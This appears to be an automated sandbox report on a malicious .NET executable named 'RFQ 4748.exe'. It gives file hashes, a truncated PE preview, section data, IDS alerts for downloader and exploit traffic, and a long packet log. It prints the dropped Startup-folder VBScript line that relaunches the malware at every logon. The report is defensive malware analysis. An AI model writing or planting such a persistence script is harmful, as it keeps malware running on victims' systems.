                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 32%
                                                            Reputation:low
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....-g.................r............... ........@.. ....................................`.................................8...S.................................................................................... ............... ..H............text....q... ...r.................. ..`.rsrc................t..............@..@.reloc...............z..............@..B................p.......H...........t...............h............................................0..........(....*.*.0../.........(....}.......}......|......(...+..|....(....*.(....&*..0.............s.... .s..(....s....(....o.......&.....9.... Pz..(....(..... #z..(....(.....s..........o......s...........s............io......o......$..,...o.......,...o.......,...o......*.4......!$........t...........h...........V.L.......B(....(....o....*V(.... .z..(....o....*v(.... .z..(.... .......o....*....0......

                                                            C:\Users\user\AppData\Roaming\Fallback.exe:Zone.Identifier

                                                            Download File
                                                            Process:C:\Users\user\Desktop\RFQ 4748.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:modified
                                                            Size (bytes):26
                                                            Entropy (8bit):3.95006375643621
                                                            Encrypted:false
                                                            SSDEEP:3:ggPYV:rPYV
                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                            Malicious:true
                                                            Reputation:high, very likely benign file
                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fallback.vbs

                                                            Download File
                                                            Process:C:\Users\user\Desktop\RFQ 4748.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):84
                                                            Entropy (8bit):4.784560579080416
                                                            Encrypted:false
                                                            SSDEEP:3:FER/n0eFHHoUkh4EaKC54E1NHn:FER/lFHI9aZ54EX
                                                            MD5:6AFC3818583050D45EA3A71E01E9701C
                                                            SHA1:DEFFFC2B97FBF281FB4C716CC0D749E0DB75B20B
                                                            SHA-256:7CACC823FD16E2BFD3893DEC94E74A54C13CFDB63606D217863742D38421C531
                                                            SHA-512:5B207EBF88070167A3F07BF806A1874E11EAEB713CE8A9709AE672F7C03CB246B5D7D10AE56D12F6BD42EBD70D505EAEC0AE5B745BAB2656FA7FBC550B0D8A0A
                                                            Malicious:true
                                                            Reputation:low
                                                            Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\Fallback.exe"""

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):6.175068802964245
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            • DOS Executable Generic (2002/1) 0.01%
                                                            File name:RFQ 4748.exe
                                                            File size:97'280 bytes
                                                            MD5:ad61c5c16181fe8ce8fe58ab4bf3d15d
                                                            SHA1:656ccb4712cb709b217da2341e3f6069caebf0fb
                                                            SHA256:e7c828d9806cfaaa5251e8dfd14b76835a2e8f661ad392de85c6a93059202f40
                                                            SHA512:1c5c1f58177daf6744b85cfabc8d5c55b6669bee5acb1e3d64f83695a044a617f6b9d3bf0a21824e3d8ef09ee397dd77cfb01f3066a709c6ca8300dc00167ba3
                                                            SSDEEP:1536:lweD62hOc0LT1v7dmsRKEn+s0MP3p/dnfkNH+zORM2k6dRQcWmyzdBdreJAXb4+i:lweD62hOc0LldmgN0MPXoMl63VypeJWI
                                                            TLSH:8A935C7C638CAE63CE6C257CE07281464770D2A7C203E7BB7998EDE8258175F151A39B
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....-g.................r............... ........@.. ....................................`................................

                                                            File Icon

                                                            Icon Hash:00928e8e8686b000

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x41918e
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x672D9EBD [Fri Nov 8 05:16:45 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                            Entrypoint Preview

                                                            Instruction
                                                            jmp dword ptr [00402000h]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x191380x53.text
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x1a0000x600.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x1c0000xc.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x20000x171940x17200c185b9d4274a08ad41fccb1ab1ba2757False0.5001266891891892data6.226141360222747IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rsrc0x1a0000x6000x600d6c6d0e4f55e60d30e14a97604445e81False0.41796875data4.108824423085661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0x1c0000xc0x200024d957f67d860d7086c42778b56eb22False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_VERSION0x1a0a00x32cdata0.4211822660098522
                                                            RT_MANIFEST0x1a3cc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                            Imports

                                                            DLLImport
                                                            mscoree.dll_CorExeMain

                                                            Network Behavior

                                                            Suricata IDS Alerts

                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2024-11-08T11:51:18.089032+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549705193.122.6.16880TCP
                                                            2024-11-08T11:51:19.401563+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549705193.122.6.16880TCP
                                                            2024-11-08T11:51:20.144257+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549707188.114.96.3443TCP
                                                            2024-11-08T11:51:21.339167+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549708193.122.6.16880TCP
                                                            2024-11-08T11:51:25.754181+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549713188.114.96.3443TCP
                                                            2024-11-08T11:51:29.956391+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549721188.114.96.3443TCP
                                                            2024-11-08T11:51:30.265429+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.549716TCP
                                                            2024-11-08T11:51:37.385956+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549758193.122.6.16880TCP
                                                            2024-11-08T11:51:38.479711+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549758193.122.6.16880TCP
                                                            2024-11-08T11:51:39.173813+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549771188.114.96.3443TCP
                                                            2024-11-08T11:51:40.089181+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549776193.122.6.16880TCP
                                                            2024-11-08T11:51:40.805290+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549782188.114.96.3443TCP
                                                            2024-11-08T11:51:44.079836+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549802188.114.96.3443TCP
                                                            2024-11-08T11:52:08.779079+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.549938TCP

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Nov 8, 2024 11:51:10.534528017 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:10.534589052 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:10.534665108 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:10.552934885 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:10.552970886 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:11.532911062 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:11.533015966 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:11.578685045 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:11.578701019 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:11.579020977 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:11.620268106 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:11.664076090 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:11.707335949 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:11.969954967 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:11.969985008 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:11.969991922 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:11.970192909 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:11.970221043 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:12.010905981 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:12.086114883 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:12.086131096 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:12.086250067 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:12.131850958 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:12.131865978 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:12.132066965 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:12.248038054 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:12.248054028 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:12.248128891 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:12.250214100 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:12.250225067 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:12.250282049 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:12.369311094 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:12.369326115 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:12.369460106 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:12.411039114 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:12.411370039 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:12.485332966 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:12.485522985 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:12.527941942 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:12.528022051 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:12.591025114 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:12.591161013 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:12.645097971 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:12.645191908 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:12.708179951 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:12.708267927 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:12.720262051 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:12.720446110 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:12.825453043 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:12.825690985 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:12.837516069 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:12.837723017 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:12.907082081 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:12.907181978 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:12.954854965 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:12.954966068 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:13.024341106 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:13.024501085 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:13.060504913 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:13.060756922 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:13.074779034 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:13.074873924 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:13.141580105 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:13.141719103 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:13.189218998 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:13.189325094 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:13.231231928 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:13.231307983 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:13.258922100 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:13.259033918 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:13.306554079 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:13.306802988 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:13.376036882 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:13.376200914 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:13.411721945 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:13.411839008 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:13.423681021 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:13.423777103 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:13.493505955 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:13.493808031 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:13.528754950 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:13.528857946 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:13.540910006 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:13.541008949 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:13.610577106 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:13.610730886 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:13.646446943 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:13.646517992 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:13.658263922 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:13.658330917 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:13.700126886 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:13.700196981 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:13.727951050 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:13.728033066 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:13.775599957 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:13.775695086 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:13.775974989 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:13.776038885 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:13.845968008 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:13.846050978 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:13.880929947 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:13.881055117 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:13.893053055 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:13.893269062 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:13.962892056 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:13.962996960 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:13.963582993 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:13.963654995 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.009987116 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.010126114 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.010493040 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.010698080 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.080703974 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.080930948 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.081583023 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.081666946 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.127222061 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.127464056 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.169061899 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.169154882 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.198348999 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.198607922 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.198884010 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.198955059 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.244913101 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.245167971 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.286391973 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.286483049 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.315047979 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.315323114 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.315697908 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.315911055 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.361783028 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.361867905 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.403908014 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.403991938 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.432671070 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.432769060 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.432986975 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.433058023 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.468281031 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.468497038 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.479927063 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.480130911 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.549499035 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.549721956 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.549936056 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.550018072 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.550993919 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.551076889 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.597572088 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.597676039 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.597800970 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.597862005 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.667665005 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.667880058 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.668632030 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.668670893 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.668704987 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.668723106 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.668740988 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.668762922 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.716425896 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.716510057 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.720458984 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.720529079 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.788418055 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.788688898 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.788809061 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.788871050 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.788873911 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.788882971 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.788938046 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.832339048 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.832477093 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.832556963 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.832654953 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.903129101 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.903256893 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.905627012 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.905713081 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.906296968 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.906362057 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.949161053 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.949255943 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.949707985 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.949774981 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.951854944 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.951929092 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:15.020390034 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:15.020479918 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:15.023121119 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:15.023186922 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:15.023581982 CET44349704185.78.221.73192.168.2.5
